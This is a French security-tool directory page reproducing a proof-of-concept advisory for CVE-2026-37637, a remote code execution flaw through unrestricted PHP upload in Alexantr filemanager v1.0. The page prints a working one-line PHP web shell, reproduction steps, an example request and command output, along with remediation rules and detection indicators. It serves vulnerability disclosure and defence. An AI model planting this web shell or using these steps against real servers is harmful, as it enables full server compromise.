Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-37637 — Exécution de code à distance dans Alexantr filemanager v1.0 via téléversement de fichier sans restriction | Kitploit
Outils/GitHubGitHub/slo-cyber-sec/cve-2026-37637
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges Utiles
GitHubslo-cyber-sec/cve-2026-37637

CVE-2026-37637

Exécution de code à distance dans Alexantr filemanager v1.0 via téléversement de fichier sans restriction

Voir le dépôt
1il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-37637

Preuve de concept pour CVE-2026-37637 - Exécution de code à distance dans Alexantr filemanager v1.0 via un téléversement de fichier sans restriction dans filemanager.php.

Vue d'ensemble

CVE-2026-37637 est une vulnérabilité d'exécution de code à distance affectant Alexantr filemanager v1.0.

La vulnérabilité existe dans le composant filemanager.php en raison d'une validation insuffisante des fichiers téléversés. Un attaquant distant peut téléverser un fichier PHP malveillant dans un répertoire accessible via le web et exécuter des commandes arbitraires sur le serveur.

Statut CVE : Soumis à MITRE
Chercheur : CYBER-SEC Dépôt du fournisseur : https://github.com/alexantr/filemanager


Résumé de la vulnérabilité

ÉlémentDescription
Identifiant CVECVE-2026-37637
Type de vulnérabilitéExécution de code à distance
Produit concernéAlexantr filemanager
Version concernéev1.0
Composant vulnérablefilemanager.php
Vecteur d'attaqueÀ distance
Authentification requiseDépend du déploiement/de la configuration
ImpactExécution de commandes arbitraires
Cause racineTéléversement de fichier sans restriction et absence de validation des fichiers côté serveur

Impact

Un attaquant peut téléverser un fichier PHP malveillant via la fonctionnalité de téléversement de fichiers. Étant donné que les fichiers téléversés sont stockés dans un emplacement accessible via le web et que l'exécution de PHP est autorisée, l'attaquant peut exécuter des commandes système arbitraires sur le serveur.

Une exploitation réussie peut permettre à un attaquant de :

  • Exécuter des commandes arbitraires sur le serveur
  • Lire des fichiers sensibles
  • Modifier ou supprimer des fichiers de l'application
  • Téléverser des logiciels malveillants supplémentaires ou des shells web
  • Pivoter plus profondément dans l'environnement d'hébergement
  • Compromettre entièrement le serveur concerné

Détails techniques

L'application permet aux utilisateurs de téléverser des fichiers arbitraires sans valider correctement l'extension du fichier, le type MIME ou le contenu du fichier.

Un fichier PHP malveillant tel que le suivant peut être téléversé :

root@kitploit:~
<?php system($_GET['cmd']); ?>

Une fois téléversé dans un répertoire accessible via le web, l'attaquant peut exécuter des commandes en accédant au fichier via le navigateur et en transmettant des commandes via le paramètre cmd.

Exemple :

root@kitploit:~
http://target/uploads/shell.php?cmd=id

Cela entraîne l'exécution de commandes sur le système d'exploitation sous-jacent.


Étapes pour reproduire

1. Cloner l'application vulnérable

root@kitploit:~
git clone https://github.com/alexantr/filemanager
cd filemanager

2. Démarrer le serveur de développement PHP

root@kitploit:~
php -S localhost:8000

3. Accéder à l'application

Ouvrez l'application dans un navigateur :

root@kitploit:~
http://localhost:8000/filemanager.php

Selon le déploiement ou la configuration, l'application peut également être accessible via :

root@kitploit:~
http://localhost:8000/pheditor.php

4. Téléverser un fichier PHP malveillant

Créez un fichier nommé shell.php :

root@kitploit:~
<?php system($_GET['cmd']); ?>

Téléversez le fichier à l'aide de la fonctionnalité de téléversement de l'application.

5. Exécuter une commande

Après avoir téléversé le fichier, accédez-y directement depuis le navigateur :

root@kitploit:~
http://localhost:8000/uploads/shell.php?cmd=id

Si l'exploitation réussit, le serveur exécutera la commande et renverra la sortie.

Exemple de sortie :

root@kitploit:~
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Preuve de concept

Charge utile PHP malveillante

root@kitploit:~
<?php system($_GET['cmd']); ?>

Exemple de requête

root@kitploit:~
GET /uploads/shell.php?cmd=id HTTP/1.1
Host: target
User-Agent: Mozilla/5.0
Connection: close

Résultat attendu

La commande fournie via le paramètre cmd est exécutée sur le serveur.


Cause racine

La vulnérabilité est causée par une validation insuffisante côté serveur dans la fonctionnalité de téléversement de fichiers.

L'application ne restreint pas correctement :

  • Les extensions de fichiers
  • Les types MIME
  • Le contenu des fichiers
  • La destination du téléversement
  • Les permissions d'exécution dans le répertoire de téléversement

Par conséquent, des fichiers PHP exécutables peuvent être téléversés et exécutés directement.


Remédiation recommandée

Le fournisseur et les utilisateurs doivent mettre en œuvre les protections suivantes.

1. Bloquer les extensions de fichiers dangereuses

Interdire le téléversement de types de fichiers exécutables tels que :

root@kitploit:~
.php, .phtml, .php3, .php4, .php5, .phar

2. Utiliser une liste blanche

Autoriser uniquement les types de fichiers attendus, par exemple :

root@kitploit:~
.jpg, .png, .gif, .txt, .pdf

3. Valider le type MIME et le contenu du fichier

Ne pas se fier uniquement à l'en-tête Content-Type fourni par le client.

La validation des fichiers doit être effectuée côté serveur.

4. Stocker les fichiers téléversés en dehors de la racine web

Les fichiers téléversés ne doivent pas être directement exécutables ni accessibles publiquement.

5. Désactiver l'exécution de PHP dans les répertoires de téléversement

Pour Apache, cela peut être fait avec .htaccess :

root@kitploit:~
php_flag engine off
RemoveHandler .php .phtml .php3 .php4 .php5 .phar
RemoveType .php .phtml .php3 .php4 .php5 .phar

Pour Nginx, empêcher le traitement de PHP dans les chemins de téléversement :

root@kitploit:~
location /uploads/ {
    location ~ \.php$ {
        deny all;
    }
}

6. Renommer les fichiers téléversés

Utiliser des noms de fichiers aléatoires générés par le serveur et supprimer les extensions contrôlées par l'utilisateur.

7. Appliquer un contrôle d'accès approprié

Restreindre la fonctionnalité de téléversement aux seuls utilisateurs de confiance.


Détection

Les administrateurs peuvent rechercher des fichiers PHP suspects téléversés dans les répertoires accessibles via le web.

Exemples d'indicateurs :

root@kitploit:~
shell.php
cmd.php
upload.php
backdoor.php
fichiers .php dans les répertoires de téléversement

Les modèles de requêtes suspects peuvent inclure :

root@kitploit:~
?cmd=
?exec=
?shell=
?command=

Exemple d'entrée de journal :

root@kitploit:~
GET /uploads/shell.php?cmd=id HTTP/1.1

Avertissement

Ce dépôt est fourni à des fins éducatives et de sécurité défensive uniquement.

Les informations et la preuve de concept sont destinées à aider les développeurs, les administrateurs système et les professionnels de la sécurité à comprendre et à corriger la vulnérabilité.

N'utilisez pas ces informations pour attaquer des systèmes sans autorisation explicite. L'accès non autorisé à des systèmes informatiques est illégal.

L'auteur n'est pas responsable de toute utilisation abusive des informations fournies dans ce dépôt.


Références

  • https://github.com/alexantr/filemanager
  • https://cve.mitre.org/
Télécharger l’outil